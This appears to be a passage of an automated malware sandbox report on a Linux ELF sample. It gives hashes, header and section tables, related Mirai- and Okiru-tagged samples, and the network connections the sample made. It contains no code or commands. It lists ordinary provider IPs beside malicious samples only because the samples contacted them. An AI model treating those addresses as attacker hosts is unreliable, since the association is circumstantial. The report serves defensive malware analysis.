                    109.202.202.202wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                      JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                        qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                          qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                            FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                              qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                  l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                    4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                      XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                        91.189.91.43wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                          JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                            qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                              qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                  46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                    l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                      4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                        XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                                          85x5rW00VC.elfGet hashmaliciousGafgytBrowse
                                                            91.189.91.42wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                              JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                  qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                    FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                            4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                              XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CANONICAL-ASGBwn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                • 91.189.91.42
                                                                                qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                NlF293hgXW.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                PN9QHDmpS1.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                eGjHpgUwlt.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                CANONICAL-ASGBwn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                • 91.189.91.42
                                                                                qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                NlF293hgXW.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                PN9QHDmpS1.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                eGjHpgUwlt.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 185.125.190.26
                                                                                INIT7CHwn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                • 109.202.202.202
                                                                                qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                No context
                                                                                No context
                                                                                No created / dropped files found
                                                                                File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                Entropy (8bit):4.3054594046232575
                                                                                TrID:
                                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                File name:uycqnGcDJD.elf
                                                                                File size:204'104 bytes
                                                                                MD5:a4e62f667819edc0c3d826522a9416d7
                                                                                SHA1:74f4f2615f9f8268565c7b7f23af4f462ca39ad4
                                                                                SHA256:449f200f7a3c6c4452bdf1b6e475432e9e1c0330e3001c81b6c97d98c7cd746d
                                                                                SHA512:ae2341eeb57e27d0d8be974c5b626d410ef42458ea1be6b7b8c1e2be2a62021c9fc8179e13b5e3cd2147993402d32b6d808c1271a1bbe31197d736c16d07df40
                                                                                SSDEEP:3072:cP5Cs5huxt7OqOy0x5OF4RMDxevui+rjFG5RJRbWHTHBQHHupHuHHHHHHHHHHHH2:cP5Cs5huDOqOyUmBsRb
                                                                                TLSH:FA14390675C188FDC4DEC1744B9EB53BE932F49C1229B16B27C4AE321E5EE315A2EE41
                                                                                File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................R.......Q.............P...............Q.td....................................................H...._........H........

                                                                                ELF header

                                                                                Class:ELF64
                                                                                Data:2's complement, little endian
                                                                                Version:1 (current)
                                                                                Machine:Advanced Micro Devices X86-64
                                                                                Version Number:0x1
                                                                                Type:EXEC (Executable file)
                                                                                OS/ABI:UNIX - System V
                                                                                ABI Version:0
                                                                                Entry Point Address:0x400194
                                                                                Flags:0x0
                                                                                ELF Header Size:64
                                                                                Program Header Offset:64
                                                                                Program Header Size:56
                                                                                Number of Program Headers:3
                                                                                Section Header Offset:203464
                                                                                Section Header Size:64
                                                                                Number of Section Headers:10
                                                                                Header String Table Index:9
                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                NULL0x00x00x00x00x0000
                                                                                .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                                                .textPROGBITS0x4001000x1000x18af20x00x6AX0016
                                                                                .finiPROGBITS0x418bf20x18bf20xe0x00x6AX001
                                                                                .rodataPROGBITS0x418c000x18c000x38b00x00x2A0032
                                                                                .ctorsPROGBITS0x522eb00x28d600x180x00x3WA008
                                                                                .dtorsPROGBITS0x522ec80x28d780x100x00x3WA008
                                                                                .dataPROGBITS0x522ee00x28d900x8cf80x00x3WA0032
                                                                                .bssNOBITS0x52bbe00x31a880x70200x00x3WA0032
                                                                                .shstrtabSTRTAB0x00x31a880x3e0x00x0001
                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                LOAD0x00x4000000x4000000x1c4b00x1c4b06.40390x5R E0x100000.init .text .fini .rodata
                                                                                LOAD0x22eb00x522eb00x51d0000xebd80x10fd500.15340x6RW 0x100000.ctors .dtors .data .bss
                                                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 19, 2024 13:10:49.916685104 CEST43928443192.168.2.2391.189.91.42
                                                                                Apr 19, 2024 13:10:55.291785002 CEST42836443192.168.2.2391.189.91.43
                                                                                Apr 19, 2024 13:10:56.315642118 CEST4251680192.168.2.23109.202.202.202
                                                                                Apr 19, 2024 13:11:11.161856890 CEST43928443192.168.2.2391.189.91.42
                                                                                Apr 19, 2024 13:11:21.400223017 CEST42836443192.168.2.2391.189.91.43
                                                                                Apr 19, 2024 13:11:27.543493032 CEST4251680192.168.2.23109.202.202.202
                                                                                Apr 19, 2024 13:11:52.115926981 CEST43928443192.168.2.2391.189.91.42

                                                                                System Behavior

                                                                                Start time (UTC):11:10:50
                                                                                Start date (UTC):19/04/2024
                                                                                Path:/tmp/uycqnGcDJD.elf
                                                                                Arguments:/tmp/uycqnGcDJD.elf
                                                                                File size:204104 bytes
                                                                                MD5 hash:a4e62f667819edc0c3d826522a9416d7